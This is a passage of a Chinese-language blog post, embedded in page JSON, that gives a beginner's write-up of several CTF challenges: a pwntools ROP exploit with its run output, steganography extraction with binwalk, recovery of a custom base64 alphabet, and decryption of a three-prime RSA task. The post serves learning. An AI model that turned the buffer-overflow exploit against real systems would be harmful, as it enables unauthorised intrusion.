\u7684\u65b9\u6cd5\u627e\u51fa\u6ea2\u51fa offset\uff0c\u5c31\u53ef\u4ee5\u6784\u9020 exploit \u4e86<\/p>\n<pre class=\"lang:default decode:true \">from pwn import *\r\nc=remote('xxx.xxx.xxx.xxx',4006)\r\nc.recvline()\r\ne=ELF('pwn-1-3-1-1')\r\nfuncaddr=e.symbols['get_flag']\r\nflagaddr=next(e.search(b'.\/flag'))\r\npopaddr=0x0000000000400903\r\npayload = b'C'*280 + p64(popaddr) + p64(flagaddr) + p64(funcaddr)\r\nc.sendline(payload)\r\nc.interactive()\r\n<\/pre>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 rop.py\r\n[+] Opening connection to xxx.xxx.xxx.xxx on port 4006: Done\r\n[*] '\/tmp\/pwn-1-3-1-1'\r\n    Arch:     amd64-64-little\r\n    RELRO:    Partial RELRO\r\n    Stack:    No canary found\r\n    NX:       NX enabled\r\n    PIE:      No PIE (0x400000)\r\n[*] Switching to interactive mode\r\nflag{ROP_is_really_rea11y_useful!!}\r\nbye bye\r\n[*] Got EOF while reading in interactive\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_yankee_with_no_brim\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>misc &#8211; Yankee with no brim<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u62ff\u5230\u624b\u662f\u8fd9\u6837\u4e00\u5f20\u56fe\u7247<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1489\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3AATM7UQ61MZWO39EN.png\" alt=\"\" width=\"608\" height=\"33\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3AATM7UQ61MZWO39EN.png 608w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3AATM7UQ61MZWO39EN-300x16.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3AATM7UQ61MZWO39EN-150x8.png 150w\" sizes=\"auto, (max-width: 608px) 100vw, 608px\" \/><\/p>\n<p>\u5c1d\u8bd5\u7528 StegSolve \u67e5\u627e LSB \u9690\u5199\uff0c\u67e5\u627e\u7279\u6b8a\u5b57\u7b26\u4e32\uff0c\u5747\u65e0\u679c<\/p>\n<p>\u4e8e\u662f\u7528 binwalk \u67e5\u627e\u7279\u6b8a\u6587\u4ef6\u5934<\/p>\n<pre class=\"lang:default decode:true \">mnihyc@mnihyc:\/tmp$ binwalk ywnb.jpg\r\n\r\nDECIMAL       HEXADECIMAL     DESCRIPTION\r\n--------------------------------------------------------------------------------\r\n0             0x0             JPEG image data, JFIF standard 1.01\r\n7596          0x1DAC          PNG image, 600 x 500, 8-bit\/color RGBA, non-interlaced\r\n7687          0x1E07          Zlib compressed data, compressed\r\n\r\n<\/pre>\n<p>\u53d1\u73b0\u91cc\u9762\u8fd8\u85cf\u4e86\u5f20 png\uff0c\u9042\u7528 foremost \u63d0\u53d6\u51fa\u6765<\/p>\n<pre class=\"lang:default decode:true \">File: ywnb.jpg\r\nStart: Sun May  3 08:11:42 2020\r\nLength: 198 KB (203497 bytes)\r\n\r\nNum      Name (bs=512)         Size      File Offset     Comment\r\n\r\n0:      00000000.jpg           7 KB               0\r\n1:      00000014.png         191 KB            7596       (600 x 500)\r\nFinish: Sun May  3 08:11:42 2020\r\n\r\n2 FILES EXTRACTED\r\n\r\njpg:= 1\r\npng:= 1\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1490\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/@F9S@7DQ8J72FHGT401U.png\" alt=\"\" width=\"612\" height=\"27\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/@F9S@7DQ8J72FHGT401U.png 612w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/@F9S@7DQ8J72FHGT401U-300x13.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/@F9S@7DQ8J72FHGT401U-150x7.png 150w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><\/p>\n<p>\u7136\u800c\u8fd9\u5f20 png \u6253\u5f00\u4e5f\u6ca1\u5565\u7279\u6b8a\u7684\uff08Windows \u53d7\u5bb3\u8005\u6765\u4e86\uff09<\/p>\n<p>\u7ecf\u8fc7\u7f51\u4e0a\u641c\u7d22\u8d44\u6599\uff08\u573a\u5916\u652f\u63f4www\uff09\u53d1\u73b0\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539 PNG \u56fe\u50cf\u7684\u5bbd\/\u9ad8\u6765\u8fbe\u5230\u9690\u85cf\u6587\u5b57\u7684\u6548\u679c\uff0c\u8fd9\u5728 Linux \u4e0b\u67e5\u770b\u65f6\u4f1a\u62a5\u9519<\/p>\n<p>\u7528 010Editor \u6253\u5f00\u6b64 PNG\uff0c\u5206\u6790\u7ed3\u6784\uff0c\u5c06\u4ee3\u8868 height \u7684\u6570\u5b57\u968f\u610f\u8c03\u5927\u4e00\u4e9b<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1491\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3RR48DHJRM02N@JXDEXN.png\" alt=\"\" width=\"723\" height=\"597\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3RR48DHJRM02N@JXDEXN.png 723w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3RR48DHJRM02N@JXDEXN-300x248.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3RR48DHJRM02N@JXDEXN-150x124.png 150w\" sizes=\"auto, (max-width: 723px) 100vw, 723px\" \/><\/p>\n<p>\u5c31\u62ff\u5230\u4e86 flag<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1492\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1GF@L0FPQX8G13QD9V76.png\" alt=\"\" width=\"440\" height=\"547\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1GF@L0FPQX8G13QD9V76.png 440w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1GF@L0FPQX8G13QD9V76-241x300.png 241w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1GF@L0FPQX8G13QD9V76-121x150.png 121w\" sizes=\"auto, (max-width: 440px) 100vw, 440px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_base64\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>crypto &#8211; \u7533\u5fc5base64<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u7ed9\u4e86\u7ecf\u8fc7\u81ea\u5b9a\u4e49\u7801\u8868\u52a0\u5bc6\u7684 cipher.txt \u4ee5\u53ca\u660e\u6587 plain.txt<\/p>\n<p>\u7136\u540e\u786c\u7740\u5934\u76ae\u53bb\u5b66\u4e86\u5b66 base64 \u662f\u548b\u52a0\u5bc6\u7684\uff08<\/p>\n<p>\u56e0\u4e3a base64 \u52a0\u5bc6\u7684\u8fc7\u7a0b\u53ea\u662f\u5728\u7801\u8868\u91cc\u5bf9\u5e94\u4f4d\u7f6e\u67e5\u67d0\u4e00\u5b57\u7b26\u7684 hash \u503c\uff0c\u6240\u4ee5\u628a base64 \u52a0\u89e3\u5bc6\u7684\u4ee3\u7801\u6284\u4e0b\u6765\u6539\u6539\u5c31\u53ef\u4ee5\u62ff\u5230 flag \u4e86<\/p>\n<p>\uff08\u56e0\u4e3a\u4ee3\u7801\u90fd\u662f\u6284\u7684\u6240\u4ee5\u7801\u98ce\u53ca\u5176\u6df7\u4e71www\uff09<\/p>\n<pre class=\"lang:default decode:true \">#include &lt;cstdio&gt;\r\n#include &lt;cstring&gt;\r\n#include &lt;cassert&gt;\r\n#include &lt;stdint.h&gt;\r\n\r\nunsigned char base64Table[65];\r\nunsigned char base64[]=\"NezuleNmCxpJYROu1ebuKUJqlETB60luleNJCUXIVeGAlezuKUJIljzuY0iu1jNhCUFB1hKa6Rf86nTm1ETo6nT8VRIB6R2aCUGB67TB60luljI8Yxf5CxfsCUXICxKs1oOuVRwZCxft60Zu10N5K7To6nTh1ebuVRwZCxN56R2u6jSECxft6nTOljS8ljN5lETs6oTJ1UOulUNslUDIcoTU1hCulhTJVezulepq6Rw\/6nOu1UI36nTBKRpa6RGECxp\/YRNBVezuVRwZCUGa17Tm6Rpt1jSa1eKwc7TtV0iu1jruVeSBlepq6Rw\/6nTs6oTqKxiu1hKBcoT0YUNmYUNECUImCxKq1UOuVjN\/1eAICUHu6jSEVezu6jSECUKs1e2u1hCuYRDaCUfIlUNB6xiu1ebu1RGBc7TJ1j2u1ewaQnTq6oTmYUzuNRwqKUNZCGpmV0fIlETsVepAlUIIlETJCxTsleImYRSBCUSjCxTE6nAI1RIB6Rw\/6nT\/VRbuKezuYUNal7TZ6Rpq6UzuKeJIKUJIloTmYUI5CUwIKETsVeNJ1oThYRDaCUXICUHuleNJCUSjCxTIVRpICUSECUHu1jNhCxfIl8Xq68Iq1jluKUJIV0fIloTs6oThV0CBCHZu6Uru1jSmCxpJQnTmYUGmCxKICxpt1hNa67TsloThYRDaCUKsCxNBlxXsKUN\/KUNZCUG8VRIBlh2uKUJICUJslhfq1Uzu1RI5K0pICUSjCxpOVRpICUGBQnTF1hXICxftVRbuKezu6eruKRwOljSm6Rpm6R2uVRKJYRw5K7TmYUzuYUS5KUIa6nTAlezu1eVu1UGB67TsloT56RHaCUXAK7TXCUfsCxpJQnTmYUGmCxpOVRpICUpJ1oTo6nTIQxTa1hXI67TJ1j2u1RG5KUNE6R2uKeImYUSAK7Tj6RNZYRw8Cxft6nTjY0XIlETs6oThV0CaCxKqKUJsK02uljNO6RGmYRw8Cxft6nTFY0pmVRFIlETmYUGmCUAJ1oTtV0iu1RGZ6nTq1oTIQxfI1jfq1jluYUI5CxKEY02uV0XsKRwZCxftY0iu6eDsVjzu1eVu1hNElEb+NUJIljzuY0iu1jrulhfEYR6Ic7TB1ETOljN4KRfqVezaCUwsCUwJKUIs1jGaCUps1j6aYRpmCUIBCUSAKUNECxpOVRpICUG5CxIIK7bun0f5CUJJQjGE6xiuV0XICUJslhfq1UzuKUruK0iuVRDacoTXKxiuVeSBl0NIlh2u6UN560Xe60iuKUJICUXIlh2u1eVuVRDaCUAJ1jFq1j2aCUGB67TqKxiu1hTO1hXmKRwqKxZu6jSECxTIVRpI68NaCUps1hTIljGmYRSBCUAJQnTB606IloT\/1eAICUG8VRIBcoT7K02uKeJwc7T51eAICxpJQnOuKUJICHAs1ebdCGKtQnT\/YUSslezuKUJqlETJlETsK0Cu6eSJ1Mru2RwZCxft60Zu1RGwCxKI1UOuV0p3c7ThYxZuVeDq1RCuKUJICUJq6eJIlh2u1RSA18fJYRbdCGKtQnOui5zuQRNJl8iuVRKsc7Tj1xZuKUJICHGm1UGBKUI\/LET0YxZu6USIlETnYRpICxTaV0ZuNUNbV0id7IKICUpt1eS56nTm1ET81ETm1ETmYUzuPRSs1oHuNezuVeJs1hpICxfsCUKsCxfsCxft6nTp1eSBcobBNezuVeJs1hpICxfsCUKsCxfsCxft6nTp1eSBCUIBCxftY0iu6UN\/VRfICUGB67TZ1ETmYUzu1hft60CuKUJq1jK5c7TB1h2uVjN\/V0N56nTmYUNwCUGE6nTIV0pwc7ToK02uVjN\/V0N56nTmYUNwCUGE6nTtV0XZgETo6RpJK0pICxftV02u6eSJ17ThYRDaCxpIl86ICxfsCUSE6eGBY0qICUGB67TF6RG5K0XICxft6nTo60pmCUSjCUSAloTI1jNE6eIIlETJ1j2uleFq1UD5c7To6RpJK0pICxftV02uVeJJ1UDI1jKICUI5CUSB6nTmYUGmCxKICUGE6nThYRDaYRw8CxfsCUG\/VeNOK7Ou1ewICxKICUGE6nTA18Kq1UDq1jluKUrulUS5KxTs1jzaCUGB67Ts1jzuKezuYRwm6RwZCxfsCxKq1oOuVRwZCxft6nTsKUJIl8iaCxfs1Eb+6jDJ6hF06RD\/1eAINUSiYRDJVmDIKxpx1AfsNUJIPRSs18m=\";\r\nunsigned char pla[]=\"We set sail on this new sea because there is new knowledge to be gained, and new rights to be won, and they must be won and used for the progress of all people. For space science, like nuclear science and all technology, has no conscience of its own. Whether it will become a force for good or ill depends on man, and only if the United States occupies a position of pre-eminence can we help decide whether this new ocean will be a sea of peace or a new terrifying theater of war. I do not say that we should or will go unprotected against the hostile misuse of space any more than we go unprotected against the hostile use of land or sea, but I do say that space can be explored and mastered without feeding the fires of war, without repeating the mistakes that man has made in extending his writ around this globe of ours.\\nThere is no strife, no prejudice, no national conflict in outer space as yet. Its hazards are hostile to us all. Its conquest deserves the best of all mankind, and its opportunity for peaceful cooperation may never come again. But why, some say, the Moon? Why choose this as our goal? And they may well ask, why climb the highest mountain? Why, 35 years ago, fly the Atlantic? Why does Rice play Texas?\\nWe choose to go to the Moon! We choose to go to the Moon...We choose to go to the Moon in this decade and do the other things, not because they are easy, but because they are hard; because that goal will serve to organize and measure the best of our energies and skills, because that challenge is one that we are willing to accept, one we are unwilling to postpone, and one we intend to win, and the others, too.\\n\";\r\n\r\nchar * base64_encode(const unsigned char * bindata, const unsigned char*base64, int binlength)\r\n{\r\n\tint i, j;\r\n\tunsigned char current;\r\n\r\n\tfor (i = 0, j = 0; i &lt; binlength; i += 3)\r\n\t{\r\n\t\tcurrent = (bindata[i] &gt;&gt; 2);\r\n\t\tcurrent &amp;= (unsigned char)0x3F;\r\n\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\tbase64Table[(int)current] = base64[j++];\r\n\r\n\t\tcurrent = ((unsigned char)(bindata[i] &lt;&lt; 4)) &amp; ((unsigned char)0x30);\r\n\t\tif (i + 1 &gt;= binlength)\r\n\t\t{\r\n\t\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\t\tbase64Table[(int)current] = base64[j++];\r\n\t\t\tbase64[j++];\/\/ = '=';\r\n\t\t\tbase64[j++];\/\/ = '=';\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tcurrent |= ((unsigned char)(bindata[i + 1] &gt;&gt; 4)) &amp; ((unsigned char)0x0F);\r\n\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\tbase64Table[(int)current] = base64[j++];\r\n\r\n\t\tcurrent = ((unsigned char)(bindata[i + 1] &lt;&lt; 2)) &amp; ((unsigned char)0x3C);\r\n\t\tif (i + 2 &gt;= binlength)\r\n\t\t{\r\n\t\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\t\tbase64Table[(int)current] = base64[j++];\r\n\t\t\tbase64[j++];\/\/ = '=';\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tcurrent |= ((unsigned char)(bindata[i + 2] &gt;&gt; 6)) &amp; ((unsigned char)0x03);\r\n\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\tbase64Table[(int)current] = base64[j++];\r\n\r\n\t\tcurrent = ((unsigned char)bindata[i + 2]) &amp; ((unsigned char)0x3F);\r\n\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\tbase64Table[(int)current] = base64[j++];\r\n\t}\r\n\t\/\/base64[j] = '\\0';\r\n\t\/\/return base64;\r\n}\r\n\r\nunsigned char decoding_table[256];\r\nvoid build_decoding_table() {\r\n\tmemset(decoding_table,0,sizeof(decoding_table));\r\n\r\n    for (int i = 0; i &lt; 64; i++)\r\n        decoding_table[(unsigned char) base64Table[i]] = i;\r\n}\r\n\r\nunsigned char decoded_data[1048576];\r\nunsigned char *base64_decode(const unsigned char *data,\r\n                             size_t input_length,\r\n                             size_t *output_length) {\r\n\r\n    build_decoding_table();\r\n\r\n    if (input_length % 4 != 0) return NULL;\r\n\r\n    *output_length = input_length \/ 4 * 3;\r\n    if (data[input_length - 1] == '=') (*output_length)--;\r\n    if (data[input_length - 2] == '=') (*output_length)--;\r\n    for (int i = 0, j = 0; i &lt; input_length;) {\r\n\r\n        uint32_t sextet_a = data[i] == '=' ? 0 &amp; i++ : decoding_table[data[i++]];\r\n        uint32_t sextet_b = data[i] == '=' ? 0 &amp; i++ : decoding_table[data[i++]];\r\n        uint32_t sextet_c = data[i] == '=' ? 0 &amp; i++ : decoding_table[data[i++]];\r\n        uint32_t sextet_d = data[i] == '=' ? 0 &amp; i++ : decoding_table[data[i++]];\r\n\r\n        uint32_t triple = (sextet_a &lt;&lt; 3 * 6)\r\n        + (sextet_b &lt;&lt; 2 * 6)\r\n        + (sextet_c &lt;&lt; 1 * 6)\r\n        + (sextet_d &lt;&lt; 0 * 6);\r\n\r\n        if (j &lt; *output_length) decoded_data[j++] = (triple &gt;&gt; 2 * 8) &amp; 0xFF;\r\n        if (j &lt; *output_length) decoded_data[j++] = (triple &gt;&gt; 1 * 8) &amp; 0xFF;\r\n        if (j &lt; *output_length) decoded_data[j++] = (triple &gt;&gt; 0 * 8) &amp; 0xFF;\r\n    }\r\n}\r\n\r\nint main()\r\n{\r\n\tbase64_encode(pla,base64,strlen((const char*)pla));\r\n\tfor(int i=0;i&lt;64;i++)\r\n\t\tprintf(\"%c\",base64Table[i]);\r\n\tsize_t t;\r\n\tbase64_decode(base64,strlen((const char*)base64),&amp;t);\r\n\tprintf(\"\\n%s\",decoded_data);\r\n}<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1493\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30.png\" alt=\"\" width=\"979\" height=\"358\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30.png 979w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30-300x110.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30-150x55.png 150w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30-768x281.png 768w\" sizes=\"auto, (max-width: 979px) 100vw, 979px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_rsa-1\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>crypto &#8211; RSA-1<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u7ed9\u4e86\u4e2a rsa-1.py<\/p>\n<pre class=\"lang:default decode:true \">p = 252647779892687905173761792949656998433\r\nq = 290615416181922737045361451171930371659\r\nr = 281613259213037257262703439109757908501\r\n\r\nn = p * q * r\r\ne = 0x10001\r\nprint(pow(flag, e, n))\r\n# 1169612223485519024207841670191078798101684935551461601922416127588930439758194701318838707953651437973827125265577<\/pre>\n<p>\u4e5f\u662f\u786c\u7740\u5934\u76ae\u53bb\u5b66\u4e86\u5b66 RSA \u52a0\u5bc6\uff0c\u53d1\u73b0\u6bd4\u9884\u8ba1\u7684\u7b80\u5355\u4e00\u70b9\uff08\uff08<\/p>\n<p>\u867d\u7136\u8fd9\u91cc\u6709 p q r \u4e09\u4e2a\u8d28\u6570\uff0c\u4f46\u662f e d n \u52a0\u89e3\u5bc6\u90a3\u4e00\u5957\u8fd8\u662f\u901a\u7528\u7684\uff0c\u6bd5\u7adf\u6ca1\u6709\u7528\u5230 CRT\uff08\u7b11<\/p>\n<pre class=\"lang:default decode:true \">import gmpy2\r\np = gmpy2.mpz(252647779892687905173761792949656998433)\r\nq = gmpy2.mpz(290615416181922737045361451171930371659)\r\nr = gmpy2.mpz(281613259213037257262703439109757908501)\r\nn=p*q*r\r\ne = gmpy2.mpz(0x10001)\r\nphin=(p-1)*(q-1)*(r-1)\r\nd=gmpy2.invert(e,phin)\r\nprint('%x'%pow(1169612223485519024207841670191078798101684935551461601922416127588930439758194701318838707953651437973827125265577,d,n))\r\n<\/pre>\n<p>\u76f4\u63a5\u89e3\u5bc6\u5373\u53ef<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_end\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>\u5c3e\u8a00<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u4e0d\u5f97\u4e0d\u8bf4\u840c\u65b0\u7684\u7b2c\u4e00\u6b21 CTF \u7ecf\u5386\u5bf9\u54b1\u542f\u53d1\u8fd8\u662f\u633a\u5927\u7684qwq<\/p>\n<p>\u9664\u4e86 web \u90a3\u90e8\u5206\u611f\u89c9\u6bd4\u8f83\u7b80\u5355\uff0c\u5176\u4ed6\u9898\u90fd\u662f\u5bf9\u54b1\u840c\u65b0\u83dc\u9e21\u7684\u6311\u6218qqq<\/p>\n<p>\u4e0d\u4ec5\u5b66\u5230\u4e86\u633a\u591a\u4e1c\u897f<span style=\"color: #ffffff;\">\uff0c\u540c\u65f6\u8fd8\u6df7\u6c34\u6df7\u5230\u4e86 Rank#5 (((<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1496\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX.png\" alt=\"\" width=\"1133\" height=\"297\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX.png 1133w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX-300x79.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX-1024x268.png 1024w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX-150x39.png 150w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX-768x201.png 768w\" sizes=\"auto, (max-width: 1133px) 100vw, 1133px\" \/><\/p>\n<p><span style=\"color: #ffffff;\">%%%%%%%%%%%%% rxz mcfx woshiluo Ciel QAQAutoMaton \u4ee5\u53ca\u5176\u4ed6\u6240\u6709\u7fa4\u53cb<\/span><\/p>\n<p>\u662f\u6211\u592a\u83dc\u4e86\u5c31\u5bf9\u4e86\uff08\u8fd8\u6709\u4e09\u9053\u9898\u505a\u4e0d\u51fa\u6765\uff08<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u9760\u7740\u795e\u901a\u5e7f\u5927\u7684\u7fa4\u53cb\u5173\u7cfb\uff08\uff09\u6df7\u8fdb\u4e86 HIT \u7684 CTF \u961f\u62db\u65b0\u6bd4\u8d5b\uff0c\u5b66\u5230\u4e86\u5f88\u591a\u59ff\u52bf\u548c pwn \u7ecf\u9a8c\uff0c\u6545\u5728\u6b64\u8bb0\u5f55\u4e00 &hellip; <a href=\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\" class=\"more-link\">\u7ee7\u7eed\u9605\u8bfb<span class=\"screen-reader-text\">\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp &#038; \u5b66\u4e60\u7ecf\u9a8c<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1473","post","type-post","status-publish","format-standard","hentry","category-security"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp &amp; \u5b66\u4e60\u7ecf\u9a8c - mnihyc&#039;s Blog<\/title>\n<meta name=\"description\" content=\"\u9760\u7740\u795e\u901a\u5e7f\u5927\u7684\u7fa4\u53cb\u5173\u7cfb\uff08\uff09\u6df7\u8fdb\u4e86 HIT \u7684 CTF \u961f\u62db\u65b0\u6bd4\u8d5b\uff0c\u5b66\u5230\u4e86\u5f88\u591a\u59ff\u52bf\u548c pwn \u7ecf\u9a8c\uff0c\u6545\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\u3002 \u840c\u65b0\u83dc\u9e21\u9996\u53d1 CTF\uff0c\u9898\u76ee\u6bd4\u8f83\u7b80\u5355\uff0c\u800c\u4e14\u8fd8\u6ca1\u6709 AK\uff0c\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u6b65\uff08 \u8fd8\u6709 %%%%%% rxz mcfx &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u73af\u5883\u51c6\u5907 pwn -game\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp &amp; \u5b66\u4e60\u7ecf\u9a8c - mnihyc&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"\u9760\u7740\u795e\u901a\u5e7f\u5927\u7684\u7fa4\u53cb\u5173\u7cfb\uff08\uff09\u6df7\u8fdb\u4e86 HIT \u7684 CTF \u961f\u62db\u65b0\u6bd4\u8d5b\uff0c\u5b66\u5230\u4e86\u5f88\u591a\u59ff\u52bf\u548c pwn \u7ecf\u9a8c\uff0c\u6545\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\u3002 \u840c\u65b0\u83dc\u9e21\u9996\u53d1 CTF\uff0c\u9898\u76ee\u6bd4\u8f83\u7b80\u5355\uff0c\u800c\u4e14\u8fd8\u6ca1\u6709 AK\uff0c\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u6b65\uff08 \u8fd8\u6709 %%%%%% rxz mcfx &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u73af\u5883\u51c6\u5907 pwn -game\" \/>\n<meta property=\"og:url\" content=\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\" \/>\n<meta property=\"og:site_name\" content=\"mnihyc&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2020-05-04T17:40:15+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-05T09:46:43+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png\" \/>\n<meta name=\"author\" content=\"mnihyc\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@mnihyc\" \/>\n<meta name=\"twitter:site\" content=\"@mnihyc\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"mnihyc\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#article\",\"isPartOf\":{\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\"},\"author\":{\"name\":\"mnihyc\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"headline\":\"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp &#038; \u5b66\u4e60\u7ecf\u9a8c\",\"datePublished\":\"2020-05-04T17:40:15+00:00\",\"dateModified\":\"2020-05-05T09:46:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\"},\"wordCount\":238,\"commentCount\":2,\"publisher\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"image\":{\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#primaryimage\"},\"thumbnailUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png\",\"articleSection\":[\"\u5b89\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\",\"url\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\",\"name\":\"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp & \u5b66\u4e60\u7ecf\u9a8c - mnihyc&#039;s 